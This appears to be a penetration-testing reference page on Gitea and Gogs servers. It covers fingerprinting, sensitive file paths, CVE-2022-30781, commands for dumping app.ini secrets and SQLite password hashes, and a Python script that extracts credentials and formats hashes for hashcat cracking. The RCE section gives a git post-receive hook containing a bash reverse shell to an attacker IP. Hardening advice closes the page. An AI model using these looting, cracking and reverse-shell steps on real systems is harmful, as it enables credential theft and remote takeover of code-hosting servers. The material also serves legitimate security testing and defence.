Gitea / Gogs
aka gogs
Self-hosted Git service: Gitea, and Gogs, the project it was forked from, normally listening on tcp/3000. Three things leak on a compromised host: the repos themselves (committed secrets), app.ini (DB and mailer creds, SECRET_KEY, INTERNAL_TOKEN) and the SQLite DB (user password hashes). An admin, or a user the admin has granted git-hook rights, can plant a server-side git hook that runs as the service account on every push, which is the RCE primitive.
Ports
| Port | Proto | Notes |
|---|---|---|
| 3000 | tcp | Gitea/Gogs web UI (default; changed via HTTP_PORT in app.ini) |
Fingerprint
- 'Powered by Gitea Version: x.y.z' or 'Gogs Version: x.y.z' in the page footer; Gitea can hide it with SHOW_FOOTER_VERSION = false, so its absence proves nothing
- GET /api/v1/version on Gitea returns {"version":"x.y.z"} without authentication
Key files
| Path | Holds | Sensitive |
|---|---|---|
| /data/gitea/conf/app.ini | DB creds, SECRET_KEY, INTERNAL_TOKEN, mailer creds (Docker default path; package installs usually use /etc/gitea/app.ini) | sensitive |
| /data/gitea/gitea.db | SQLite: user table with salted password hashes (pbkdf2 by default; passwd_hash_algo says which), admin and git-hook flags, API token hashes | sensitive |
| custom/conf/app.ini, data/gogs.db | Gogs equivalents, relative to the Gogs working directory | sensitive |
Default / weak creds
There is no vendor default account: the first user registered on the install page becomes the site admin, so guessing is limited to the usual admin/admin-style pairs. The better yield is the repos themselves: search every repo and its history for hard-coded passwords, API tokens and committed .git-credentials files.
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2022-30781 | Gitea before 1.16.7: the remote passed to git fetch during repository migration is not escaped (argument injection reached through the migration SSRF); public exploits turn it into authenticated RCE as the service account |
Exploitation primitives
- Authenticated admin (or a user flagged allow_git_hook) → add a server-side pre-receive/update/post-receive hook that runs as the Gitea/Gogs service account on the next push; on Gitea this needs DISABLE_GIT_HOOKS = false (the default is true in current releases)
- Loot app.ini for SECRET_KEY, INTERNAL_TOKEN and DB/mailer creds, and gitea.db for user hashes to crack offline (pbkdf2 by default; check passwd_hash_algo)
- Search every repo's full history, not just HEAD, for committed passwords, tokens and config files
Overview
Gitea (a fork of Gogs) is a lightweight Git host on tcp/3000. On a box it is two things at once: a credential store (repos, app.ini and the SQLite DB all leak secrets) and an RCE primitive (server-side git hooks).
Loot the config and DB
Pull the config — SECRET_KEY, INTERNAL_TOKEN, DB and mailer creds:
cat /data/gitea/conf/app.ini
Dump user hashes from the SQLite DB. passwd_hash_algo exists only on newer Gitea (Gogs rows are always legacy pbkdf2); the admin and git-hook flags tell you which accounts are worth cracking first:
sqlite3 /data/gitea/gitea.db "select name,passwd_hash_algo,salt,passwd,is_admin,allow_git_hook from user;"
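The two loot steps above, done offline in one script, as an added example (this is not Gitea or Gogs project code). It pulls the credential-bearing keys out of app.ini, reads the user table, converts each pbkdf2 row into the `sha256:<iter>:<b64 salt>:<b64 digest>` line hashcat mode 10900 expects, and verifies a candidate password the way Gitea does. The hash parameters are the real Gitea/Gogs defaults (PBKDF2-HMAC-SHA256, 10000 rounds, 50-byte key, 10-character text salt; Gitea 1.19+ encodes its rounds in passwd_hash_algo as `pbkdf2$<iter>$<keylen>`). The app.ini text, the user row, the salt and the password `Winter2023!` are constructed sample data.

```python
"""Added example (not Gitea/Gogs project code): triage a looted app.ini and
gitea.db offline. All input below is constructed sample data so it runs
without a target."""
import base64
import configparser
import hashlib
import hmac
import sqlite3

# Keys worth pulling out of app.ini, per section (real Gitea key names).
SECRET_KEYS = {
    "security": ("SECRET_KEY", "INTERNAL_TOKEN"),
    "database": ("DB_TYPE", "HOST", "NAME", "USER", "PASSWD", "PATH"),
    "mailer": ("SMTP_ADDR", "HOST", "USER", "PASSWD"),
}


def loot_app_ini(text):
    """Return {section: {key: value}} for the credential-bearing keys.
    Gitea writes top-level keys before the first [section], which configparser
    rejects, so a synthetic header is prepended. interpolation=None because
    values may contain '%'; values are often wrapped in backticks."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str  # keep Gitea's upper-case key names
    cp.read_string("[__root__]\n" + text)
    found = {}
    for section, keys in SECRET_KEYS.items():
        if cp.has_section(section):
            hits = {k: cp[section][k].strip('`"') for k in keys if k in cp[section]}
            if hits:
                found[section] = hits
    return found


def parse_algo(algo):
    """'pbkdf2' (legacy / Gogs, no column) -> 10000 rounds, 50-byte key;
    'pbkdf2$<iter>$<keylen>' (Gitea 1.19+) carries its own parameters."""
    if not algo:
        return 10000, 50
    parts = algo.split("$")
    if parts[0] != "pbkdf2":
        raise ValueError("not PBKDF2: " + algo)
    iters = int(parts[1]) if len(parts) > 1 else 10000
    keylen = int(parts[2]) if len(parts) > 2 else 50
    return iters, keylen


def to_hashcat_10900(salt, passwd_hex, algo=None):
    """hashcat -m 10900 wants sha256:<iter>:<b64 salt>:<b64 digest>. PBKDF2
    derives the key block by block, so the first 32 bytes of the stored
    50-byte key are exactly a 32-byte PBKDF2 output; truncate to those."""
    iters, _ = parse_algo(algo)
    digest = bytes.fromhex(passwd_hex)[:32]
    return "sha256:%d:%s:%s" % (
        iters,
        base64.b64encode(salt.encode()).decode(),
        base64.b64encode(digest).decode(),
    )


def check_password(candidate, salt, passwd_hex, algo=None):
    """Offline check of one candidate against a stored row, as Gitea does it."""
    iters, keylen = parse_algo(algo)
    derived = hashlib.pbkdf2_hmac("sha256", candidate.encode(), salt.encode(), iters, keylen)
    return hmac.compare_digest(derived.hex(), passwd_hex.lower())


def dump_users(conn):
    """Rows that matter: who is admin / may edit git hooks, plus a hashcat
    line for every pbkdf2 row (None for argon2/scrypt/bcrypt rows)."""
    rows = conn.execute(
        "select name, passwd_hash_algo, salt, passwd, is_admin, allow_git_hook from user"
    ).fetchall()
    return [
        {"name": n, "algo": a, "salt": s, "passwd": p,
         "is_admin": bool(adm), "allow_git_hook": bool(hook),
         "hashcat": to_hashcat_10900(s, p, a) if (a or "pbkdf2").startswith("pbkdf2") else None}
        for n, a, s, p, adm, hook in rows
    ]


# Constructed sample app.ini (values are placeholders, not real secrets).
SAMPLE_APP_INI = """APP_NAME = Gitea: Git with a cup of tea
RUN_USER = git

[database]
DB_TYPE = sqlite3
PATH = /data/gitea/gitea.db

[security]
INSTALL_LOCK = true
SECRET_KEY = constructed-secret-key-not-real
INTERNAL_TOKEN = constructed-internal-token

[mailer]
ENABLED = true
USER = notify@corp.example
PASSWD = `constructed-mail-password`
"""


def build_sample_db():
    """Constructed in-memory stand-in for gitea.db: one admin whose password
    is 'Winter2023!', hashed here with the legacy defaults."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table user (name text, passwd_hash_algo text, salt text,"
                 " passwd text, is_admin int, allow_git_hook int)")
    salt = "Zq3vKp9LxT"  # Gitea salts are 10 random ASCII characters
    pw_hex = hashlib.pbkdf2_hmac("sha256", b"Winter2023!", salt.encode(), 10000, 50).hex()
    conn.execute("insert into user values (?,?,?,?,?,?)", ("admin", "pbkdf2", salt, pw_hex, 1, 0))
    conn.commit()
    return conn


if __name__ == "__main__":
    print(loot_app_ini(SAMPLE_APP_INI))
    for u in dump_users(build_sample_db()):
        print(u["name"], "admin" if u["is_admin"] else "user", u["hashcat"])
        print("  Winter2023! matches:", check_password("Winter2023!", u["salt"], u["passwd"], u["algo"]))
```

Point the `sqlite3.connect` at the real gitea.db and feed `open(...).read()` of the real app.ini to `loot_app_ini`; the hashcat lines go straight into `hashcat -m 10900 hashes.txt wordlist`. Rows whose passwd_hash_algo is argon2, scrypt or bcrypt come back with `hashcat = None` and need their own modes.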
RCE via git hooks
As an admin (or a user flagged allow_git_hook), and on Gitea only if DISABLE_GIT_HOOKS = false, open the repo's Settings → Git Hooks → post-receive in the UI and paste:
#!/bin/bash
bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1
Then, with a listener waiting on <YOUR_IP>:4444, push a commit that actually updates a ref (post-receive does not fire on a no-op push). The hook runs as the account Gitea/Gogs itself runs as, usually git, on the server.
Hardening
Patch promptly (the git fetch bug above was fixed in 1.16.7). Leave DISABLE_GIT_HOOKS = true in [security] unless server-side hooks are genuinely needed, and keep the is_admin and allow_git_hook flags to the few accounts that need them. app.ini and gitea.db must be owned by the service user and unreadable by anyone else (mode 0600), and that applies to backups and container volumes too. Treat SECRET_KEY and INTERNAL_TOKEN as rotate-on-exposure, and run secret scanning on repos, because anything committed once stays in history.
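The app.ini settings behind those notes, as an added example fragment (not a config shipped by Gitea). Section and key names are Gitea's; the `gitea generate secret` commands in the placeholders are the real CLI for minting new values.

```ini
; Added hardening fragment for app.ini (example, not Gitea's default config).
[security]
; Removes the git-hook editor (UI and API) even for site admins.
DISABLE_GIT_HOOKS = true
; Both sign sessions and internal calls: regenerate if app.ini was ever readable by others.
SECRET_KEY = <output of: gitea generate secret SECRET_KEY>
INTERNAL_TOKEN = <output of: gitea generate secret INTERNAL_TOKEN>

[other]
; Stops the exact version appearing in the footer (note /api/v1/version still reports it).
SHOW_FOOTER_VERSION = false
```

Restart Gitea after changing [security] values; rotating SECRET_KEY invalidates existing sessions, which is the point if the file leaked.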